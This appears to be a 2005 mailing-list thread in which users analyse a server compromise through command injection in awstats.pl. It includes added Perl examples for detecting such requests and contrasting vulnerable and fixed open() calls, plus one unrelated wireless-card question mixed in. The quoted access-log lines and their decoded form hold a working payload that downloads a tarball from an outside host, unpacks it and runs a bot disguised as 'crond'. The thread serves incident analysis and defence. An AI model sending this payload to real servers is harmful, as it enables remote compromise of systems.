Hey guys,
I just thought I would let you know how my server got compromised. This even happened after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 634 "-" "-"
-cs
On Fri, 04.03.2005 at 17:40, Chris Strzelczyk wrote:
I just thought I would let you know how my server got compromised. This even happened after I installed the new version of awstats on Wednesday. So in short I don't know if it is OK to run awstats as a cgi executable.
These are from my access log:
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 634 "-" "-"
-cs
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 634 "-" "-"
-cs
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
BTW, I am MOST appreciative of people who follow-up on their issues as Chris did.
Thanks
David Cary Hart wrote:
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
(snip)
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Paul.
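As an added illustration of the decoding step Paul performs above (this is not code from the thread or from awstats), the following Perl script does the same URL decoding over access-log lines and flags any awstats request whose configdir parameter begins with "|" or carries shell metacharacters. The first two sample lines are the requests quoted earlier in the thread (rejoined where the mail client wrapped them); the third is a constructed benign request for comparison. Only core Perl is used.

```perl
#!/usr/bin/perl
# Added example (not part of the original thread or of awstats): decode the
# URL-encoded awstats requests from an access log and flag configdir values
# that could reach a shell or a Perl pipe-open.
use strict;
use warnings;

# Sample input: the two requests quoted in the thread (rejoined where the
# mail client wrapped them) plus one constructed benign request.
my @sample_lines = (
    '"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"',
    '"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 634 "-" "-"',
    '"GET /cgi-bin/awstats.pl?config=www.example.com&configdir=/etc/awstats HTTP/1.1" 200 9123 "-" "-"',   # constructed, benign
);

# Decode one level of URL encoding, the way the web server hands the query
# string to a CGI script ('+' becomes a space, %XX becomes the byte).
# A single pass means %2500 becomes the literal text "%00", not a NUL.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Split "a=b&c=d" into a hash. Splitting happens before decoding so that an
# encoded "=" or "&" inside a value (e.g. PATH%3d) stays part of that value.
sub parse_query {
    my ($query) = @_;
    my %params;
    for my $pair (split /&/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        $params{ url_decode($k) } = url_decode(defined $v ? $v : '');
    }
    return \%params;
}

# Characters that let a parameter escape into a shell or a pipe-open.
my $SHELL_META = qr/[|;&`\$<>\n\r\0]/;

# Examine one access-log line. Returns undef for requests that do not touch
# awstats.pl, otherwise a hashref with the decoded query and any findings.
sub inspect_line {
    my ($line) = @_;
    return undef
        unless $line =~ m{"(?:GET|POST)\s+(/cgi-bin/awstats\.pl)(?:\?(\S*))?\s+HTTP/};
    my ($path, $query) = ($1, defined $2 ? $2 : '');
    my $params    = parse_query($query);
    my $configdir = $params->{configdir};
    my @reasons;
    if (defined $configdir) {
        push @reasons, 'configdir starts with "|" (Perl pipe-open)' if $configdir =~ /^\s*\|/;
        push @reasons, 'configdir contains shell metacharacters'     if $configdir =~ $SHELL_META;
        push @reasons, 'configdir carries a NUL / %00 terminator'    if $configdir =~ /\0|%00/;
    }
    return {
        path          => $path,
        decoded_query => url_decode($query),
        params        => $params,
        suspicious    => @reasons ? 1 : 0,
        reasons       => \@reasons,
    };
}

my $alerts = 0;
for my $line (@sample_lines) {
    my $r = inspect_line($line) or next;
    $alerts++ if $r->{suspicious};
    print $r->{suspicious} ? 'ALERT' : 'ok', ": $r->{path}?$r->{decoded_query}\n";
    print "  - $_\n" for @{ $r->{reasons} };
}
print "$alerts of ", scalar(@sample_lines), " awstats requests flagged\n";
```

Run it against a real log with `perl inspect.pl < access_log` after replacing the sample array with a read loop; the two quoted requests are reported with all three reasons, the constructed request with none. Remember that the decoded value is what the script saw, so the `%00` that survives the single decoding pass is the literal text awstats would have appended to the file name, not a NUL byte.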
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:
On Fri, 2005-03-04 at 18:34 +0100, Alexander Dalloz wrote:
"GET /cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%20zburchi%2eidilis%2ero%2fbadboy%2etar%2egz%3btar%20%2dzxvf%20badboy%2etar%2egz%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"
(snip)
Thank you for this report. So you are saying that even with awstats 6.4 you got compromised as Apache did execute the logged command and a trojan then started running located in /tmp? If so, would you please be so kind and report that issue to the awstats project guys as soon as possible?
Alexander:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
<snip>
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
By just requesting http://site/cgi-bin/awstats.pl?configdir=....bad stuff....
David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
It is enough if the script does something as stupid as:
system("cat $configdir/somefile")
(Assuming value of configdir is stored in $configdir variable).
What gets executed is:
cat |echo ; echo b_exp; [...]; echo e_exp;%00/somefile
The last part will produce an error, most likely, but who cares; the important part was already executed...
It is a classic example of command injection. Most exploits of that type are for SQL queries. This one is for the shell.
David Cary Hart wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
David Cary Hart wrote:
Could you explain the series of events? It's not clear - to me - how this resulted in a compromised machine.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
I got that part. What I am trying to understand (please bear with me) is how the attacker might have modified the script command line.
I'm not all that familiar with perl, so the following may be completely wrong, but here goes.
awstats.pl contains code to search for its configuration file. A directory name may be specified as a parameter to the script. For each directory that the script searches, it tries the following:
if (open(CONFIG,"$searchdir$PROG.$SiteConfig.conf")) ...
Normally, this would cause the file pointed to by the expansion of "$searchdir$PROG.$SiteConfig.conf" to be opened. Now, if $searchdir starts with "|", instead of opening a file and then reading it, this runs the text following the "|" as a command and then reads back the output of the command from a pipe. So by using the "|", the attacker has tricked the script into running his command.
Paul.
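The mechanism Paul describes (a two-argument open() whose file name starts with "|") and the system() variant explained earlier in the thread can both be seen side by side with their fixed forms. The script below is an added example, not awstats code; the variable names $searchdir, $PROG and $SiteConfig follow the snippet quoted above, the "attacker" value is hypothetical and does nothing beyond an echo, and the config file it reads is created in a temporary directory so the script runs stand-alone.

```perl
#!/usr/bin/perl
# Added example, not awstats code: the two-argument open() next to the
# three-argument form, an allow-list check for the parameter, and the
# list form of system() that never touches a shell.
use strict;
use warnings;
use File::Temp qw(tempdir);

$| = 1;   # unbuffered stdout so child-process output lines up with ours

my $PROG       = 'awstats';
my $SiteConfig = 'www.example.com';

# A benign configdir: a temporary directory holding a small config file.
my $benign_dir = tempdir(CLEANUP => 1) . '/';
open(my $out, '>', "$benign_dir$PROG.$SiteConfig.conf") or die "cannot write config: $!";
print $out "LogFile=/var/log/httpd/access_log\n";
close $out;

# A hypothetical attacker-supplied configdir. The part after "|" is only an
# echo, so it merely shows that a command was started at all.
my $hostile_dir = '|echo "command started by pipe-open"; echo ';

# Report what a handle really is: a pipe to a child process, or a file.
sub describe_handle {
    my ($fh) = @_;
    return 'a PIPE to a running command, not a file' if -p $fh;
    my $first = <$fh>;
    chomp $first if defined $first;
    return 'a file whose first line is: ' . (defined $first ? $first : '(empty)');
}

# VULNERABLE: two-argument open. Perl inspects the string itself; a leading
# "|" means "start the rest as a command and connect the handle to it".
sub open_config_two_arg {
    my ($searchdir) = @_;
    my $name = "$searchdir$PROG.$SiteConfig.conf";
    open(my $fh, $name) or return "open failed: $!";
    my $what = describe_handle($fh);
    close $fh;
    return "opened $what";
}

# FIXED: three-argument open. The mode is "<", so the second argument can
# only ever be a file name; "|" has no special meaning there.
sub open_config_three_arg {
    my ($searchdir) = @_;
    my $name = "$searchdir$PROG.$SiteConfig.conf";
    open(my $fh, '<', $name) or return "open failed: $!";
    my $what = describe_handle($fh);
    close $fh;
    return "opened $what";
}

# Belt and braces: a directory name that arrives over the network should
# match a tight allow-list before it goes anywhere near open() or system().
sub valid_configdir {
    my ($dir) = @_;
    return defined $dir
        && $dir =~ m{\A[A-Za-z0-9_./-]+\z}
        && $dir !~ m{\.\.};    # and no parent-directory traversal
}

# The system() case from earlier in the thread: a single string is run by
# /bin/sh, the list form executes cat directly and the value stays an
# argument. (Hypothetical file name, as in the thread.)
sub cat_config_no_shell {
    my ($dir) = @_;
    return system('cat', "$dir/somefile");
}

print "two-arg open, benign dir:    ", open_config_two_arg($benign_dir),    "\n";
print "two-arg open, hostile dir:   ", open_config_two_arg($hostile_dir),   "\n";
print "three-arg open, hostile dir: ", open_config_three_arg($hostile_dir), "\n";
for my $dir ($benign_dir, $hostile_dir, '../../etc') {
    printf "valid_configdir(%s): %s\n", $dir, valid_configdir($dir) ? 'accept' : 'reject';
}
print "list-form system() with hostile dir (cat just fails, no echo runs):\n";
cat_config_no_shell($hostile_dir);
```

With the hostile value the two-argument open reports a pipe and the echo text appears on the terminal, while the three-argument open simply fails with "No such file or directory"; the allow-list rejects the value before either is reached. Running the CGI under Perl's taint mode (`-T`) would additionally refuse to pass an unchecked parameter to open() in pipe form or to system() at all.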
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
I have reported this to awstats. Thanks for your help everybody.
-cs
Hi,
I try to get my 3CRWE154G72 3COM 802.11g working. It will not work. I tried kudzu, it finds the card uses the prism54 driver. When I configure my SSID and WEP key and then try to activate the card I get Error for
Wireless request et Bit Rate (8B20) Set Failed on device eth1; Input/Output error. SIOCSIFFLAGS no such file or directory
On Fri, 04 Mar 2005 20:06:03 +0100, Wemeelen wemeelen@xs4all.nl wrote:
Hi,
I try to get my 3CRWE154G72 3COM 802.11g working. It will not work. I tried kudzu, it finds the card uses the prism54 driver. When I configure my SSID and WEP key and then try to activate the card I get Error for
Wireless request et Bit Rate (8B20) Set Failed on device eth1; Input/Output error. SIOCSIFFLAGS no such file or directory
--
I used to get this, though for a different card (belkin f5d6001). I don't know what the problem is, but I eventually stopped using RedHat's Network Config and instead use NetworkManager and NetworkManagerInfo. It works better than the previous setup. Run it from a terminal to see any output errors maybe?!
Ganesh
On Fri, 2005-03-04 at 12:51 -0600, Brian Fahrlander wrote:
On Fri, 2005-03-04 at 17:58 +0000, Paul Howarth wrote:
Replace the url-encoded characters and you get:
/cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv mech crond;export PATH=;crond;echo e_exp;%00
So the attacker has tricked the script into executing a set of shell commands, which include changing directory to /tmp, downloading a tarball from a Romanian site, extracting that tarball and then executing a program from the downloaded and extracted tarball, after renaming it to "crond" in an effort to disguise it.
Damned fine research. Good job; I'm impressed.
Thank you!
Incidentally, some of the suggestions that came up earlier in this discussion, namely mounting /tmp with the noexec option and running SELinux, would have foiled *this particular* exploit of the awstats vulnerability.
Paul.